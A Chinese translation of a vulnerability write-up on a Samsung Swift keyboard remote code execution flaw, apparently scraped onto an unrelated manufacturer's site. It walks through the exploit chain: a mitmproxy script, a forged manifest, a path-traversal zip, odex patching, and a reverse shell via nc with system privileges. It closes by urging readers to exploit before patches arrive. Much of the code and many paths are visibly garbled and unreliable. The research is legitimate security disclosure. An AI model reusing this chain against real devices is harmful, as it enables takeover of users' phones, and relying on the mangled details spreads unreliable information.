刨冰机厂家
免费服务热线

Free service

hotline

010-00000000
刨冰机厂家
热门搜索:
技术资讯
当前位置:首页 > 技术资讯

三星手机远程代码执行漏洞分析

发布时间:2020-03-30 17:47:58 阅读: 来源:刨冰机厂家

三星手机远程代码执行漏洞分析摘要

远程攻击者完全有能力控制用户网络流量,操纵三星手机的键盘更新机制,并且在目标手机上使用系统用户权限执行代码。

在三星设备中预装的快速键盘,无法禁用也无法卸载。即使这个快速键盘并非用户默认使用,攻击者也能够利用!

概念验证:

工作原理

不幸的是,OEM以及运营商经常会在设备中预装一些第三方软件,许多情况下这些软件所拥有的权限特别高。这次的主角是三星的Swift keyboard

?/k|head-3package:name='putmethod'versionCode='4'versionName='4.0'sdkVersion:'18'targetSdkVersion:'19'?/k

?/l|grepsharedA:android:sharedUserId(0x0101000b)="stem"(Raw:"stem")

从中我们可以看出这个键盘输入软件使用三星的私有签名,并且在设备中拥有特殊权限。system权限啊,这尼玛!

准备工作

针对此漏洞的攻击媒介需要攻击者能够修改上行流量,该漏洞在重启后可自动触发。

测试机器为一台带USB Wi-Fi工具的Linux VM,所有的http流量都重定向到

漏洞的发现

Swift有一个更新机制,运行添加新语言或者升级现有语言。当用户下载一个附加语言包,我们看到网络请求:

GET←200application/zip995.63kB601ms

当Zip文件下载完成,就进行提取了:

/data/data/putmethod/app_SwiftKey/<languagePackAbbrev>/.

root@kltevzw:/data/data/putmethod/app_SwiftKey/az_AZ#ls-l-rw-------systemsystem6063662015-06-1115:16az_AZ_bg_1-rw-------systemsystem15248142015-06-1115:16az_AZ_bg_3-rw-------systemsystem4132015-06-1115:on-rw-------systemsystem362015-06-1115:on-rw-------systemsystem552015-06-1115:on

可以看到.zip文件被写入system权限,这个权限能操作系统文件了。由于应用程序通过明文方式发送zip文件,我们尝试进行一些修改。

我们可以通过设置一个全局Wi-Fi代理并且在计算机上将设备指向mitmproxy。接着编写一个快速脚本:

defrequest(context,flow):st==""dswith(".zip"):returnresp=HTTPResponse([1,1],200,"OK",ODictCaseless([["Content-Type","application/zip"]]),"helloworld")withopen('test_p','r')asf:payload=ad()ntent=aders["Content-Length"]=[len(payload)]ply(resp)

payload十分简单,就包含一个文件

?/tmpunzip-ltest_pArchive:test_pLengthDateTimeName--------------------606-11-1515:33test---------------61file

检测/data/data/putmethod/app_SwiftKey/<languagePackAbbrev> 之后,我们注意到不论是我们的语言包还是测试文件都不存在了。应用程序验证了zip文件,经过后面的探寻,在之前下载的zip文件中发现一个manifest,这个manifest包括了所有语言包,语言包的url,及zip包的SHA1 hash。

在mitmproxy中的请求:

>>GET←200application/json15.38kB310ms

通过jq我们仔细观察这个manifest文件:

?curl-s'[]|select(.name=="English(US)")'

服务器返回一个语言表,语言表的URL,以及他们的SHA1 hash。服务器响应示例:

{"name":"English(US)","language":"en","country":"US","sha1":"3b98ee695b3482bd8128e3bc505b427155aba032","version":13,"archive":"{"sha1":"b846a2433cf5fbfb4f6f9ba6c27b6462bb1a923c","version":1181,"archive":"}}

我们正在下载的语言升级包SHA1经过manifest中的信息验证,如果我们预先计算出payload的SHA1并创建我们自己的manifest文件,我们就可以随意的改变这些zip文件了。此外,对于我们的payload,给先添加一个路径遍历,并试图将文件写入/data/.

?samsung_keyboard_pArchive:pLengthDateTimeName----------------------------52014-08-2218:52../../../../../../../../data/payload----------------51file

适当的修改manifest文件之后,我们检查我们payload文件,谢天谢地还在。

?samsung_keyboard_haxadbxshellsu-c"ls-l/data/payload"-rw-------systemsystem52014-08-2216:07payload

文件写入可执行代码

现在,我们可以将任意文件赋予system权限了,我们的目标是就是将他粗暴的写入代码执行。Swift keyboard 自身在其目录并没有可执行代码可供我们覆盖。别吵,我们去别处看看。

对文件进行dex优化之后,会缓存在/data/dalvik-cache/。我们现在需要寻找system组的文件,这样就可以通过system user权限执行。

root@kltevzw:/data/dalvik-cache#/data/local/tmp/busyboxfind.-typef-group1000./system@framework@r@x./system@framework@r@x./system@framework@r@x./system@framework@k@x./system@framework@r@x./system@framework@r@x./system@framework@r@x./system@framework@r@x./system@framework@r@x./system@framework@r@x./system@priv-app@k@x

在列表中,我们要选择一个目标组件自动调用。理想情况下,对于整个odex文件仅替换我们感兴趣的目标。最好选择DeviceTest(/data/dalvik-cache/system@priv-app@k@x) 作为目标。

反编译之后查看manifest文件,我们看到应用确实有sharedUserId=”stem”,并且看到BroadcastReceiver定义,启动它可以自动进行重启设备。

<manifestandroid:sharedUserId="stem"android:versionCode="1"android:versionName="1.0"package="ctory"xmlns:android="

我们需要为ctoryTestBroadcastReceiver生成一个odex文件:

?va|try;ass;le;oadcastReceiver;ntext;ent;g;publicclassFactoryTestBroadcastReceiverextendsBroadcastReceiver{//Exploitcodehere}

创建完payload之后,我们可以通过DalvikExchange (dx)工具编译并运行它用来获取一个包含dalvik 字节代码的.jar文件。现在进行一些优化,将jar推送到设备生成odex

ANDROID_DATA=/data/local/tmpdalvikvm-cp/data/local/tmp/<r>ctoryTestBroadcastReceiver

缓存文件所在目录,shell用户可读

shell@kltevzw:/data/local/tmp/dalvik-cache$ls-l-rw-r--r--shellshell30242014-07-1814:09data@local@tmp@r@x

将payload注入到我们语言包之后,触发下载并重启。

D/dalvikvm(6276):DexOpt:---BEGIN'r'(bootstrap=0)---D/dalvikvm(6277):DexOpt:load10ms,verify+opt6ms,112652bytesD/dalvikvm(6276):DexOpt:---END'r'(success)---I/dalvikvm(6366):DexOpt:sourcefilemodtimemismatch(3edeaec0vs3ed6b326)

作为.ODEX 头的一部分,其存储CRC32以及x的修改时间,它根据原始APK的zip文件结构表:

unzip-vlSM-G900V_KOT49H_xArchive:SM-G900V_KOT49H_kLengthMethodSizeRatioDateTimeCRC-32Name--------------------------------------------643852Defl:N24847961%06-22-1122:x-------------------------64385224847961%1file

我们需要从zip文件中拉取这两点信息,以及修补我们经过odex的payload,让其看上去像是从原始k生成的。请注意,CRC32以及文件修改时间并不能作为一种安全机制。我们需要明白,当缓存需要更新是因为应用程序需要更新。

修补我们的.ODEX文件并触发漏洞,将会执行我们的payload。出于测试目的,这里仅仅是一个反向壳

nc192.168.181.968889iduid=1000(system)gid=1000(system)groups=1000(system),1001(radio),1007(log),1010(wifi),1015(sdcard_rw),1021(gps),1023(media_rw),1024(mtp),1028(sdcard_r),2001(cache),3001(net_bt_admin),3002(net_bt),3003(inet),3004(net_raw),3005(net_admin),3009(qcom_diag),41000(u0_a31000)context=u:r:system_app:s0

视频

结语

不幸的是,这款键盘输入软件即使禁用了也能被利用。在运营商修补该漏洞之前尽情的玩耍吧。

*参考来源nowsecure,译者/鸢尾 转载请注明来自FreeBuf黑客与极客

上海嘉定注册公司

水罐消防车

铝方通吊顶价格

天天墙地装制